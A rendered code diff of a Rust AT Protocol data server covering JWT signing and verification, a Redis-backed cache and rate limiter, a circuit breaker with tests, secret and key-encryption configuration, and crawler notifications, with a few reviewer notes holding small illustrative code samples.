159
194
token,
160
195
jti,
161
196
expires_at,
162
197
})
163
198
}
199
+
164
200
fn sign_claims_hs256(claims: Claims, typ: &str, secret: &[u8]) -> Result<String> {
165
201
let header = Header {
166
202
alg: "HS256".to_string(),
167
203
typ: typ.to_string(),
168
204
};
205
+
169
206
let header_json = serde_json::to_string(&header)?;
170
207
let claims_json = serde_json::to_string(&claims)?;
208
+
171
209
let header_b64 = URL_SAFE_NO_PAD.encode(header_json);
172
210
let claims_b64 = URL_SAFE_NO_PAD.encode(claims_json);
211
+
173
212
let message = format!("{}.{}", header_b64, claims_b64);
213
+
174
214
let mut mac = HmacSha256::new_from_slice(secret)
175
215
.map_err(|e| anyhow::anyhow!("Invalid secret length: {}", e))?;
176
216
mac.update(message.as_bytes());
217
+
177
218
let signature = mac.finalize().into_bytes();
178
219
let signature_b64 = URL_SAFE_NO_PAD.encode(signature);
220
+
179
221
Ok(format!("{}.{}", message, signature_b64))
180
222
}
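
Reviewer note: a compact, self-contained illustration of the three-segment layout the HS256 helpers above emit (base64url header, base64url claims, HMAC-SHA256 over the dot-joined pair). The DemoClaims struct is deliberately simplified and is not the crate's Claims type.

use base64::{engine::general_purpose::URL_SAFE_NO_PAD, Engine as _};
use hmac::{Hmac, Mac};
use serde::Serialize;
use sha2::Sha256;

#[derive(Serialize)]
struct DemoClaims {
    sub: String,
    scope: String,
    exp: i64,
}

// Mirrors sign_claims_hs256's wire format with a reduced claim set.
fn sign_demo_token(claims: &DemoClaims, secret: &[u8]) -> String {
    let header = r#"{"alg":"HS256","typ":"at+jwt"}"#;
    let message = format!(
        "{}.{}",
        URL_SAFE_NO_PAD.encode(header),
        URL_SAFE_NO_PAD.encode(serde_json::to_string(claims).unwrap()),
    );
    let mut mac = Hmac::<Sha256>::new_from_slice(secret).expect("HMAC accepts any key length");
    mac.update(message.as_bytes());
    format!("{}.{}", message, URL_SAFE_NO_PAD.encode(mac.finalize().into_bytes()))
}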
+48
src/auth/verify.rs
···
8
8
use k256::ecdsa::{Signature, SigningKey, VerifyingKey, signature::Verifier};
9
9
use sha2::Sha256;
10
10
use subtle::ConstantTimeEq;
11
+
11
12
type HmacSha256 = Hmac<Sha256>;
13
+
12
14
pub fn get_did_from_token(token: &str) -> Result<String, String> {
13
15
let parts: Vec<&str> = token.split('.').collect();
14
16
if parts.len() != 3 {
15
17
return Err("Invalid token format".to_string());
16
18
}
19
+
17
20
let payload_bytes = URL_SAFE_NO_PAD
18
21
.decode(parts[1])
19
22
.map_err(|e| format!("Base64 decode failed: {}", e))?;
23
+
20
24
let claims: UnsafeClaims =
21
25
serde_json::from_slice(&payload_bytes).map_err(|e| format!("JSON decode failed: {}", e))?;
26
+
22
27
Ok(claims.sub.unwrap_or(claims.iss))
23
28
}
29
+
24
30
pub fn get_jti_from_token(token: &str) -> Result<String, String> {
25
31
let parts: Vec<&str> = token.split('.').collect();
26
32
if parts.len() != 3 {
27
33
return Err("Invalid token format".to_string());
28
34
}
35
+
29
36
let payload_bytes = URL_SAFE_NO_PAD
30
37
.decode(parts[1])
31
38
.map_err(|e| format!("Base64 decode failed: {}", e))?;
39
+
32
40
let claims: serde_json::Value =
33
41
serde_json::from_slice(&payload_bytes).map_err(|e| format!("JSON decode failed: {}", e))?;
42
+
34
43
claims.get("jti")
35
44
.and_then(|j| j.as_str())
36
45
.map(|s| s.to_string())
37
46
.ok_or_else(|| "No jti claim in token".to_string())
38
47
}
48
+
39
49
pub fn verify_token(token: &str, key_bytes: &[u8]) -> Result<TokenData<Claims>> {
40
50
verify_token_internal(token, key_bytes, None, None)
41
51
}
52
+
42
53
pub fn verify_access_token(token: &str, key_bytes: &[u8]) -> Result<TokenData<Claims>> {
43
54
verify_token_internal(
44
55
token,
···
47
58
Some(&[SCOPE_ACCESS, SCOPE_APP_PASS, SCOPE_APP_PASS_PRIVILEGED]),
48
59
)
49
60
}
61
+
50
62
pub fn verify_refresh_token(token: &str, key_bytes: &[u8]) -> Result<TokenData<Claims>> {
51
63
verify_token_internal(
52
64
token,
···
55
67
Some(&[SCOPE_REFRESH]),
56
68
)
57
69
}
70
+
58
71
pub fn verify_access_token_hs256(token: &str, secret: &[u8]) -> Result<TokenData<Claims>> {
59
72
verify_token_hs256_internal(
60
73
token,
···
63
76
Some(&[SCOPE_ACCESS, SCOPE_APP_PASS, SCOPE_APP_PASS_PRIVILEGED]),
64
77
)
65
78
}
79
+
66
80
pub fn verify_refresh_token_hs256(token: &str, secret: &[u8]) -> Result<TokenData<Claims>> {
67
81
verify_token_hs256_internal(
68
82
token,
···
71
85
Some(&[SCOPE_REFRESH]),
72
86
)
73
87
}
88
+
74
89
fn verify_token_internal(
75
90
token: &str,
76
91
key_bytes: &[u8],
···
81
96
if parts.len() != 3 {
82
97
return Err(anyhow!("Invalid token format"));
83
98
}
99
+
84
100
let header_b64 = parts[0];
85
101
let claims_b64 = parts[1];
86
102
let signature_b64 = parts[2];
103
+
87
104
let header_bytes = URL_SAFE_NO_PAD
88
105
.decode(header_b64)
89
106
.context("Base64 decode of header failed")?;
107
+
90
108
let header: Header =
91
109
serde_json::from_slice(&header_bytes).context("JSON decode of header failed")?;
110
+
92
111
if let Some(expected) = expected_typ {
93
112
if header.typ != expected {
94
113
return Err(anyhow!("Invalid token type: expected {}, got {}", expected, header.typ));
95
114
}
96
115
}
116
+
97
117
let signature_bytes = URL_SAFE_NO_PAD
98
118
.decode(signature_b64)
99
119
.context("Base64 decode of signature failed")?;
120
+
100
121
let signature = Signature::from_slice(&signature_bytes)
101
122
.map_err(|e| anyhow!("Invalid signature format: {}", e))?;
123
+
102
124
let signing_key = SigningKey::from_slice(key_bytes)?;
103
125
let verifying_key = VerifyingKey::from(&signing_key);
126
+
104
127
let message = format!("{}.{}", header_b64, claims_b64);
105
128
verifying_key
106
129
.verify(message.as_bytes(), &signature)
107
130
.map_err(|e| anyhow!("Signature verification failed: {}", e))?;
131
+
108
132
let claims_bytes = URL_SAFE_NO_PAD
109
133
.decode(claims_b64)
110
134
.context("Base64 decode of claims failed")?;
135
+
111
136
let claims: Claims =
112
137
serde_json::from_slice(&claims_bytes).context("JSON decode of claims failed")?;
138
+
113
139
let now = Utc::now().timestamp() as usize;
114
140
if claims.exp < now {
115
141
return Err(anyhow!("Token expired"));
116
142
}
143
+
117
144
if let Some(scopes) = allowed_scopes {
118
145
let token_scope = claims.scope.as_deref().unwrap_or("");
119
146
if !scopes.contains(&token_scope) {
120
147
return Err(anyhow!("Invalid token scope: {}", token_scope));
121
148
}
122
149
}
150
+
123
151
Ok(TokenData { claims })
124
152
}
153
+
125
154
fn verify_token_hs256_internal(
126
155
token: &str,
127
156
secret: &[u8],
···
132
161
if parts.len() != 3 {
133
162
return Err(anyhow!("Invalid token format"));
134
163
}
164
+
135
165
let header_b64 = parts[0];
136
166
let claims_b64 = parts[1];
137
167
let signature_b64 = parts[2];
168
+
138
169
let header_bytes = URL_SAFE_NO_PAD
139
170
.decode(header_b64)
140
171
.context("Base64 decode of header failed")?;
172
+
141
173
let header: Header =
142
174
serde_json::from_slice(&header_bytes).context("JSON decode of header failed")?;
175
+
143
176
if header.alg != "HS256" {
144
177
return Err(anyhow!("Expected HS256 algorithm, got {}", header.alg));
145
178
}
179
+
146
180
if let Some(expected) = expected_typ {
147
181
if header.typ != expected {
148
182
return Err(anyhow!("Invalid token type: expected {}, got {}", expected, header.typ));
149
183
}
150
184
}
185
+
151
186
let signature_bytes = URL_SAFE_NO_PAD
152
187
.decode(signature_b64)
153
188
.context("Base64 decode of signature failed")?;
189
+
154
190
let message = format!("{}.{}", header_b64, claims_b64);
191
+
155
192
let mut mac = HmacSha256::new_from_slice(secret)
156
193
.map_err(|e| anyhow!("Invalid secret: {}", e))?;
157
194
mac.update(message.as_bytes());
195
+
158
196
let expected_signature = mac.finalize().into_bytes();
159
197
let is_valid: bool = signature_bytes.ct_eq(&expected_signature).into();
198
+
160
199
if !is_valid {
161
200
return Err(anyhow!("Signature verification failed"));
162
201
}
202
+
163
203
let claims_bytes = URL_SAFE_NO_PAD
164
204
.decode(claims_b64)
165
205
.context("Base64 decode of claims failed")?;
206
+
166
207
let claims: Claims =
167
208
serde_json::from_slice(&claims_bytes).context("JSON decode of claims failed")?;
209
+
168
210
let now = Utc::now().timestamp() as usize;
169
211
if claims.exp < now {
170
212
return Err(anyhow!("Token expired"));
171
213
}
214
+
172
215
if let Some(scopes) = allowed_scopes {
173
216
let token_scope = claims.scope.as_deref().unwrap_or("");
174
217
if !scopes.contains(&token_scope) {
175
218
return Err(anyhow!("Invalid token scope: {}", token_scope));
176
219
}
177
220
}
221
+
178
222
Ok(TokenData { claims })
179
223
}
224
+
180
225
pub fn get_algorithm_from_token(token: &str) -> Result<String, String> {
181
226
let parts: Vec<&str> = token.split('.').collect();
182
227
if parts.len() != 3 {
183
228
return Err("Invalid token format".to_string());
184
229
}
230
+
185
231
let header_bytes = URL_SAFE_NO_PAD
186
232
.decode(parts[0])
187
233
.map_err(|e| format!("Base64 decode failed: {}", e))?;
234
+
188
235
let header: Header =
189
236
serde_json::from_slice(&header_bytes).map_err(|e| format!("JSON decode failed: {}", e))?;
237
+
190
238
Ok(header.alg)
191
239
}
+24
src/cache/mod.rs
···
2
2
use base64::{Engine as _, engine::general_purpose::STANDARD as BASE64};
3
3
use std::sync::Arc;
4
4
use std::time::Duration;
5
+
5
6
#[derive(Debug, thiserror::Error)]
6
7
pub enum CacheError {
7
8
#[error("Cache connection error: {0}")]
···
9
10
#[error("Serialization error: {0}")]
10
11
Serialization(String),
11
12
}
13
+
12
14
#[async_trait]
13
15
pub trait Cache: Send + Sync {
14
16
async fn get(&self, key: &str) -> Option<String>;
···
22
24
self.set(key, &encoded, ttl).await
23
25
}
24
26
}
27
+
25
28
#[derive(Clone)]
26
29
pub struct ValkeyCache {
27
30
conn: redis::aio::ConnectionManager,
28
31
}
32
+
29
33
impl ValkeyCache {
30
34
pub async fn new(url: &str) -> Result<Self, CacheError> {
31
35
let client = redis::Client::open(url)
···
36
40
.map_err(|e| CacheError::Connection(e.to_string()))?;
37
41
Ok(Self { conn: manager })
38
42
}
43
+
39
44
pub fn connection(&self) -> redis::aio::ConnectionManager {
40
45
self.conn.clone()
41
46
}
42
47
}
48
+
43
49
#[async_trait]
44
50
impl Cache for ValkeyCache {
45
51
async fn get(&self, key: &str) -> Option<String> {
···
51
57
.ok()
52
58
.flatten()
53
59
}
60
+
54
61
async fn set(&self, key: &str, value: &str, ttl: Duration) -> Result<(), CacheError> {
55
62
let mut conn = self.conn.clone();
56
63
redis::cmd("SET")
···
62
69
.await
63
70
.map_err(|e| CacheError::Connection(e.to_string()))
64
71
}
72
+
65
73
async fn delete(&self, key: &str) -> Result<(), CacheError> {
66
74
let mut conn = self.conn.clone();
67
75
redis::cmd("DEL")
···
71
79
.map_err(|e| CacheError::Connection(e.to_string()))
72
80
}
73
81
}
82
+
74
83
pub struct NoOpCache;
84
+
75
85
#[async_trait]
76
86
impl Cache for NoOpCache {
77
87
async fn get(&self, _key: &str) -> Option<String> {
78
88
None
79
89
}
90
+
80
91
async fn set(&self, _key: &str, _value: &str, _ttl: Duration) -> Result<(), CacheError> {
81
92
Ok(())
82
93
}
94
+
83
95
async fn delete(&self, _key: &str) -> Result<(), CacheError> {
84
96
Ok(())
85
97
}
86
98
}
99
+
87
100
#[async_trait]
88
101
pub trait DistributedRateLimiter: Send + Sync {
89
102
async fn check_rate_limit(&self, key: &str, limit: u32, window_ms: u64) -> bool;
90
103
}
104
+
91
105
#[derive(Clone)]
92
106
pub struct RedisRateLimiter {
93
107
conn: redis::aio::ConnectionManager,
94
108
}
109
+
95
110
impl RedisRateLimiter {
96
111
pub fn new(conn: redis::aio::ConnectionManager) -> Self {
97
112
Self { conn }
98
113
}
99
114
}
115
+
100
116
#[async_trait]
101
117
impl DistributedRateLimiter for RedisRateLimiter {
102
118
async fn check_rate_limit(&self, key: &str, limit: u32, window_ms: u64) -> bool {
···
124
140
count <= limit as i64
125
141
}
126
142
}
143
+
127
144
pub struct NoOpRateLimiter;
145
+
128
146
#[async_trait]
129
147
impl DistributedRateLimiter for NoOpRateLimiter {
130
148
async fn check_rate_limit(&self, _key: &str, _limit: u32, _window_ms: u64) -> bool {
131
149
true
132
150
}
133
151
}
152
+
134
153
pub enum CacheBackend {
135
154
Valkey(ValkeyCache),
136
155
NoOp,
137
156
}
157
+
138
158
impl CacheBackend {
139
159
pub fn rate_limiter(&self) -> Arc<dyn DistributedRateLimiter> {
140
160
match self {
···
145
165
}
146
166
}
147
167
}
168
+
148
169
#[async_trait]
149
170
impl Cache for CacheBackend {
150
171
async fn get(&self, key: &str) -> Option<String> {
···
153
174
CacheBackend::NoOp => None,
154
175
}
155
176
}
177
+
156
178
async fn set(&self, key: &str, value: &str, ttl: Duration) -> Result<(), CacheError> {
157
179
match self {
158
180
CacheBackend::Valkey(c) => c.set(key, value, ttl).await,
159
181
CacheBackend::NoOp => Ok(()),
160
182
}
161
183
}
184
+
162
185
async fn delete(&self, key: &str) -> Result<(), CacheError> {
163
186
match self {
164
187
CacheBackend::Valkey(c) => c.delete(key).await,
···
166
189
}
167
190
}
168
191
}
192
+
169
193
pub async fn create_cache() -> (Arc<dyn Cache>, Arc<dyn DistributedRateLimiter>) {
170
194
match std::env::var("VALKEY_URL") {
171
195
Ok(url) => match ValkeyCache::new(&url).await {
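
Reviewer note: one benefit of the trait-object design (Arc<dyn Cache>) is cheap test doubles. The sketch below is not part of this change; it assumes the Cache and CacheError items shown above are in scope and implements only the three required methods, deliberately ignoring TTLs, so it is suitable for unit tests but not as a production backend.

use async_trait::async_trait;
use std::collections::HashMap;
use std::time::Duration;
use tokio::sync::RwLock;

// In-memory stand-in for the Valkey-backed cache; get/set/delete only, TTL dropped.
#[derive(Default)]
struct MemoryCache {
    entries: RwLock<HashMap<String, String>>,
}

#[async_trait]
impl Cache for MemoryCache {
    async fn get(&self, key: &str) -> Option<String> {
        self.entries.read().await.get(key).cloned()
    }

    async fn set(&self, key: &str, value: &str, _ttl: Duration) -> Result<(), CacheError> {
        self.entries.write().await.insert(key.to_string(), value.to_string());
        Ok(())
    }

    async fn delete(&self, key: &str) -> Result<(), CacheError> {
        self.entries.write().await.remove(key);
        Ok(())
    }
}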
+45
src/circuit_breaker.rs
···
2
2
use std::sync::Arc;
3
3
use std::time::Duration;
4
4
use tokio::sync::RwLock;
5
+
5
6
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
6
7
pub enum CircuitState {
7
8
Closed,
8
9
Open,
9
10
HalfOpen,
10
11
}
12
+
11
13
pub struct CircuitBreaker {
12
14
name: String,
13
15
failure_threshold: u32,
···
18
20
success_count: AtomicU32,
19
21
last_failure_time: AtomicU64,
20
22
}
23
+
21
24
impl CircuitBreaker {
22
25
pub fn new(name: &str, failure_threshold: u32, success_threshold: u32, timeout_secs: u64) -> Self {
23
26
Self {
···
31
34
last_failure_time: AtomicU64::new(0),
32
35
}
33
36
}
37
+
34
38
pub async fn can_execute(&self) -> bool {
35
39
let state = self.state.read().await;
40
+
36
41
match *state {
37
42
CircuitState::Closed => true,
38
43
CircuitState::Open => {
···
41
46
.duration_since(std::time::UNIX_EPOCH)
42
47
.unwrap()
43
48
.as_secs();
49
+
44
50
if now - last_failure >= self.timeout.as_secs() {
45
51
drop(state);
46
52
let mut state = self.state.write().await;
···
56
62
CircuitState::HalfOpen => true,
57
63
}
58
64
}
65
+
59
66
pub async fn record_success(&self) {
60
67
let state = *self.state.read().await;
68
+
61
69
match state {
62
70
CircuitState::Closed => {
63
71
self.failure_count.store(0, Ordering::SeqCst);
···
75
83
CircuitState::Open => {}
76
84
}
77
85
}
86
+
78
87
pub async fn record_failure(&self) {
79
88
let state = *self.state.read().await;
89
+
80
90
match state {
81
91
CircuitState::Closed => {
82
92
let count = self.failure_count.fetch_add(1, Ordering::SeqCst) + 1;
···
110
120
CircuitState::Open => {}
111
121
}
112
122
}
123
+
113
124
pub async fn state(&self) -> CircuitState {
114
125
*self.state.read().await
115
126
}
127
+
116
128
pub fn name(&self) -> &str {
117
129
&self.name
118
130
}
119
131
}
132
+
120
133
#[derive(Clone)]
121
134
pub struct CircuitBreakers {
122
135
pub plc_directory: Arc<CircuitBreaker>,
123
136
pub relay_notification: Arc<CircuitBreaker>,
124
137
}
138
+
125
139
impl Default for CircuitBreakers {
126
140
fn default() -> Self {
127
141
Self::new()
128
142
}
129
143
}
144
+
130
145
impl CircuitBreakers {
131
146
pub fn new() -> Self {
132
147
Self {
···
135
150
}
136
151
}
137
152
}
153
+
138
154
#[derive(Debug)]
139
155
pub struct CircuitOpenError {
140
156
pub circuit_name: String,
141
157
}
158
+
142
159
impl std::fmt::Display for CircuitOpenError {
143
160
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
144
161
write!(f, "Circuit breaker '{}' is open", self.circuit_name)
145
162
}
146
163
}
164
+
147
165
impl std::error::Error for CircuitOpenError {}
166
+
148
167
pub async fn with_circuit_breaker<T, E, F, Fut>(
149
168
circuit: &CircuitBreaker,
150
169
operation: F,
···
158
177
circuit_name: circuit.name().to_string(),
159
178
}));
160
179
}
180
+
161
181
match operation().await {
162
182
Ok(result) => {
163
183
circuit.record_success().await;
···
169
189
}
170
190
}
171
191
}
192
+
172
193
#[derive(Debug)]
173
194
pub enum CircuitBreakerError<E> {
174
195
CircuitOpen(CircuitOpenError),
175
196
OperationFailed(E),
176
197
}
198
+
177
199
impl<E: std::fmt::Display> std::fmt::Display for CircuitBreakerError<E> {
178
200
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
179
201
match self {
···
182
204
}
183
205
}
184
206
}
207
+
185
208
impl<E: std::error::Error + 'static> std::error::Error for CircuitBreakerError<E> {
186
209
fn source(&self) -> Option<&(dyn std::error::Error + 'static)> {
187
210
match self {
···
190
213
}
191
214
}
192
215
}
216
+
193
217
#[cfg(test)]
194
218
mod tests {
195
219
use super::*;
220
+
196
221
#[tokio::test]
197
222
async fn test_circuit_breaker_starts_closed() {
198
223
let cb = CircuitBreaker::new("test", 3, 2, 10);
199
224
assert_eq!(cb.state().await, CircuitState::Closed);
200
225
assert!(cb.can_execute().await);
201
226
}
227
+
202
228
#[tokio::test]
203
229
async fn test_circuit_breaker_opens_after_failures() {
204
230
let cb = CircuitBreaker::new("test", 3, 2, 10);
231
+
205
232
cb.record_failure().await;
206
233
assert_eq!(cb.state().await, CircuitState::Closed);
234
+
207
235
cb.record_failure().await;
208
236
assert_eq!(cb.state().await, CircuitState::Closed);
237
+
209
238
cb.record_failure().await;
210
239
assert_eq!(cb.state().await, CircuitState::Open);
211
240
assert!(!cb.can_execute().await);
212
241
}
242
+
213
243
#[tokio::test]
214
244
async fn test_circuit_breaker_success_resets_failures() {
215
245
let cb = CircuitBreaker::new("test", 3, 2, 10);
246
+
216
247
cb.record_failure().await;
217
248
cb.record_failure().await;
218
249
cb.record_success().await;
250
+
219
251
cb.record_failure().await;
220
252
cb.record_failure().await;
221
253
assert_eq!(cb.state().await, CircuitState::Closed);
254
+
222
255
cb.record_failure().await;
223
256
assert_eq!(cb.state().await, CircuitState::Open);
224
257
}
258
+
225
259
#[tokio::test]
226
260
async fn test_circuit_breaker_half_open_closes_after_successes() {
227
261
let cb = CircuitBreaker::new("test", 3, 2, 0);
262
+
228
263
for _ in 0..3 {
229
264
cb.record_failure().await;
230
265
}
231
266
assert_eq!(cb.state().await, CircuitState::Open);
267
+
232
268
tokio::time::sleep(Duration::from_millis(100)).await;
233
269
assert!(cb.can_execute().await);
234
270
assert_eq!(cb.state().await, CircuitState::HalfOpen);
271
+
235
272
cb.record_success().await;
236
273
assert_eq!(cb.state().await, CircuitState::HalfOpen);
274
+
237
275
cb.record_success().await;
238
276
assert_eq!(cb.state().await, CircuitState::Closed);
239
277
}
278
+
240
279
#[tokio::test]
241
280
async fn test_circuit_breaker_half_open_reopens_on_failure() {
242
281
let cb = CircuitBreaker::new("test", 3, 2, 0);
282
+
243
283
for _ in 0..3 {
244
284
cb.record_failure().await;
245
285
}
286
+
246
287
tokio::time::sleep(Duration::from_millis(100)).await;
247
288
cb.can_execute().await;
289
+
248
290
cb.record_failure().await;
249
291
assert_eq!(cb.state().await, CircuitState::Open);
250
292
}
293
+
251
294
#[tokio::test]
252
295
async fn test_with_circuit_breaker_helper() {
253
296
let cb = CircuitBreaker::new("test", 3, 2, 10);
297
+
254
298
let result: Result<i32, CircuitBreakerError<std::io::Error>> =
255
299
with_circuit_breaker(&cb, || async { Ok(42) }).await;
256
300
assert!(result.is_ok());
257
301
assert_eq!(result.unwrap(), 42);
302
+
258
303
let result: Result<i32, CircuitBreakerError<&str>> =
259
304
with_circuit_breaker(&cb, || async { Err("error") }).await;
260
305
assert!(result.is_err());
+32
src/config.rs
···
8
8
use p256::ecdsa::SigningKey;
9
9
use sha2::{Digest, Sha256};
10
10
use std::sync::OnceLock;
11
+
11
12
static CONFIG: OnceLock<AuthConfig> = OnceLock::new();
13
+
12
14
pub const ENCRYPTION_VERSION: i32 = 1;
15
+
13
16
pub struct AuthConfig {
14
17
jwt_secret: String,
15
18
dpop_secret: String,
···
20
23
pub signing_key_y: String,
21
24
key_encryption_key: [u8; 32],
22
25
}
26
+
23
27
impl AuthConfig {
24
28
pub fn init() -> &'static Self {
25
29
CONFIG.get_or_init(|| {
···
33
37
);
34
38
}
35
39
});
40
+
36
41
let dpop_secret = std::env::var("DPOP_SECRET").unwrap_or_else(|_| {
37
42
if cfg!(test) || std::env::var("BSPDS_ALLOW_INSECURE_SECRETS").is_ok() {
38
43
"test-dpop-secret-not-for-production".to_string()
···
43
48
);
44
49
}
45
50
});
51
+
46
52
if jwt_secret.len() < 32 && std::env::var("BSPDS_ALLOW_INSECURE_SECRETS").is_err() {
47
53
panic!("JWT_SECRET must be at least 32 characters");
48
54
}
55
+
49
56
if dpop_secret.len() < 32 && std::env::var("BSPDS_ALLOW_INSECURE_SECRETS").is_err() {
50
57
panic!("DPOP_SECRET must be at least 32 characters");
51
58
}
59
+
52
60
let mut hasher = Sha256::new();
53
61
hasher.update(b"oauth-signing-key-derivation:");
54
62
hasher.update(jwt_secret.as_bytes());
55
63
let seed = hasher.finalize();
64
+
56
65
let signing_key = SigningKey::from_slice(&seed)
57
66
.unwrap_or_else(|e| panic!("Failed to create signing key from seed: {}. This is a bug.", e));
67
+
58
68
let verifying_key = signing_key.verifying_key();
59
69
let point = verifying_key.to_encoded_point(false);
70
+
60
71
let signing_key_x = URL_SAFE_NO_PAD.encode(
61
72
point.x().expect("EC point missing X coordinate - this should never happen")
62
73
);
63
74
let signing_key_y = URL_SAFE_NO_PAD.encode(
64
75
point.y().expect("EC point missing Y coordinate - this should never happen")
65
76
);
77
+
66
78
let mut kid_hasher = Sha256::new();
67
79
kid_hasher.update(signing_key_x.as_bytes());
68
80
kid_hasher.update(signing_key_y.as_bytes());
69
81
let kid_hash = kid_hasher.finalize();
70
82
let signing_key_id = URL_SAFE_NO_PAD.encode(&kid_hash[..8]);
83
+
71
84
let master_key = std::env::var("MASTER_KEY").unwrap_or_else(|_| {
72
85
if cfg!(test) || std::env::var("BSPDS_ALLOW_INSECURE_SECRETS").is_ok() {
73
86
"test-master-key-not-for-production".to_string()
···
78
91
);
79
92
}
80
93
});
94
+
81
95
if master_key.len() < 32 && std::env::var("BSPDS_ALLOW_INSECURE_SECRETS").is_err() {
82
96
panic!("MASTER_KEY must be at least 32 characters");
83
97
}
98
+
84
99
let hk = Hkdf::<Sha256>::new(None, master_key.as_bytes());
85
100
let mut key_encryption_key = [0u8; 32];
86
101
hk.expand(b"bspds-user-key-encryption", &mut key_encryption_key)
87
102
.expect("HKDF expansion failed");
103
+
88
104
AuthConfig {
89
105
jwt_secret,
90
106
dpop_secret,
···
96
112
}
97
113
})
98
114
}
115
+
99
116
pub fn get() -> &'static Self {
100
117
CONFIG.get().expect("AuthConfig not initialized - call AuthConfig::init() first")
101
118
}
119
+
102
120
pub fn jwt_secret(&self) -> &str {
103
121
&self.jwt_secret
104
122
}
123
+
105
124
pub fn dpop_secret(&self) -> &str {
106
125
&self.dpop_secret
107
126
}
127
+
108
128
pub fn encrypt_user_key(&self, plaintext: &[u8]) -> Result<Vec<u8>, String> {
109
129
use rand::RngCore;
130
+
110
131
let cipher = Aes256Gcm::new_from_slice(&self.key_encryption_key)
111
132
.map_err(|e| format!("Failed to create cipher: {}", e))?;
133
+
112
134
let mut nonce_bytes = [0u8; 12];
113
135
rand::thread_rng().fill_bytes(&mut nonce_bytes);
136
+
114
137
#[allow(deprecated)]
115
138
let nonce = Nonce::from_slice(&nonce_bytes);
139
+
116
140
let ciphertext = cipher
117
141
.encrypt(nonce, plaintext)
118
142
.map_err(|e| format!("Encryption failed: {}", e))?;
143
+
119
144
let mut result = Vec::with_capacity(12 + ciphertext.len());
120
145
result.extend_from_slice(&nonce_bytes);
121
146
result.extend_from_slice(&ciphertext);
147
+
122
148
Ok(result)
123
149
}
150
+
124
151
pub fn decrypt_user_key(&self, encrypted: &[u8]) -> Result<Vec<u8>, String> {
125
152
if encrypted.len() < 12 {
126
153
return Err("Encrypted data too short".to_string());
127
154
}
155
+
128
156
let cipher = Aes256Gcm::new_from_slice(&self.key_encryption_key)
129
157
.map_err(|e| format!("Failed to create cipher: {}", e))?;
158
+
130
159
#[allow(deprecated)]
131
160
let nonce = Nonce::from_slice(&encrypted[..12]);
132
161
let ciphertext = &encrypted[12..];
162
+
133
163
cipher
134
164
.decrypt(nonce, ciphertext)
135
165
.map_err(|e| format!("Decryption failed: {}", e))
136
166
}
137
167
}
168
+
138
169
pub fn encrypt_key(plaintext: &[u8]) -> Result<Vec<u8>, String> {
139
170
AuthConfig::get().encrypt_user_key(plaintext)
140
171
}
172
+
141
173
pub fn decrypt_key(encrypted: &[u8], version: Option<i32>) -> Result<Vec<u8>, String> {
142
174
match version.unwrap_or(0) {
143
175
0 => Ok(encrypted.to_vec()),
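
Reviewer note: a stand-alone round trip of the nonce||ciphertext layout used by encrypt_user_key and decrypt_user_key above, with a throwaway key instead of the HKDF-derived key-encryption key. Illustrative only; it exercises the same aes-gcm and rand calls as the diff but is not the crate's code path.

use aes_gcm::aead::{Aead, KeyInit};
use aes_gcm::{Aes256Gcm, Nonce};
use rand::RngCore;

fn main() {
    let mut key = [0u8; 32];
    rand::thread_rng().fill_bytes(&mut key);
    let cipher = Aes256Gcm::new_from_slice(&key).unwrap();

    let mut nonce_bytes = [0u8; 12];
    rand::thread_rng().fill_bytes(&mut nonce_bytes);
    let nonce = Nonce::from_slice(&nonce_bytes);

    let ciphertext = cipher.encrypt(nonce, b"user signing key".as_ref()).unwrap();

    // Stored blob: 12-byte nonce followed by ciphertext (which carries the GCM tag).
    let mut blob = nonce_bytes.to_vec();
    blob.extend_from_slice(&ciphertext);

    let recovered = cipher
        .decrypt(Nonce::from_slice(&blob[..12]), &blob[12..])
        .unwrap();
    assert_eq!(recovered, b"user signing key".to_vec());
}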
+19
src/crawlers.rs
···
6
6
use std::time::Duration;
7
7
use tokio::sync::{broadcast, watch};
8
8
use tracing::{debug, error, info, warn};
9
+
9
10
const NOTIFY_THRESHOLD_SECS: u64 = 20 * 60;
11
+
10
12
pub struct Crawlers {
11
13
hostname: String,
12
14
crawler_urls: Vec<String>,
···
14
16
last_notified: AtomicU64,
15
17
circuit_breaker: Option<Arc<CircuitBreaker>>,
16
18
}
19
+
17
20
impl Crawlers {
18
21
pub fn new(hostname: String, crawler_urls: Vec<String>) -> Self {
19
22
Self {
···
27
30
circuit_breaker: None,
28
31
}
29
32
}
33
+
30
34
pub fn with_circuit_breaker(mut self, circuit_breaker: Arc<CircuitBreaker>) -> Self {
31
35
self.circuit_breaker = Some(circuit_breaker);
32
36
self
33
37
}
38
+
34
39
pub fn from_env() -> Option<Self> {
35
40
let hostname = std::env::var("PDS_HOSTNAME").ok()?;
41
+
36
42
let crawler_urls: Vec<String> = std::env::var("CRAWLERS")
37
43
.unwrap_or_default()
38
44
.split(',')
39
45
.filter(|s| !s.is_empty())
40
46
.map(|s| s.trim().to_string())
41
47
.collect();
48
+
42
49
if crawler_urls.is_empty() {
43
50
return None;
44
51
}
52
+
45
53
Some(Self::new(hostname, crawler_urls))
46
54
}
55
+
47
56
fn should_notify(&self) -> bool {
48
57
let now = std::time::SystemTime::now()
49
58
.duration_since(std::time::UNIX_EPOCH)
50
59
.unwrap_or_default()
51
60
.as_secs();
61
+
52
62
let last = self.last_notified.load(Ordering::Relaxed);
53
63
now - last >= NOTIFY_THRESHOLD_SECS
54
64
}
65
+
55
66
fn mark_notified(&self) {
56
67
let now = std::time::SystemTime::now()
57
68
.duration_since(std::time::UNIX_EPOCH)
58
69
.unwrap_or_default()
59
70
.as_secs();
71
+
60
72
self.last_notified.store(now, Ordering::Relaxed);
61
73
}
74
+
62
75
pub async fn notify_of_update(&self) {
63
76
if !self.should_notify() {
64
77
debug!("Skipping crawler notification due to debounce");
65
78
return;
66
79
}
80
+
67
81
if let Some(cb) = &self.circuit_breaker {
68
82
if !cb.can_execute().await {
69
83
debug!("Skipping crawler notification due to circuit breaker open");
70
84
return;
71
85
}
72
86
}
87
+
73
88
self.mark_notified();
74
89
let circuit_breaker = self.circuit_breaker.clone();
90
+
75
91
for crawler_url in &self.crawler_urls {
76
92
let url = format!("{}/xrpc/com.atproto.sync.requestCrawl", crawler_url.trim_end_matches('/'));
77
93
let hostname = self.hostname.clone();
78
94
let client = self.http_client.clone();
79
95
let cb = circuit_breaker.clone();
96
+
80
97
tokio::spawn(async move {
81
98
match client
82
99
.post(&url)
···
116
133
}
117
134
}
118
135
}
136
+
119
137
pub async fn start_crawlers_service(
120
138
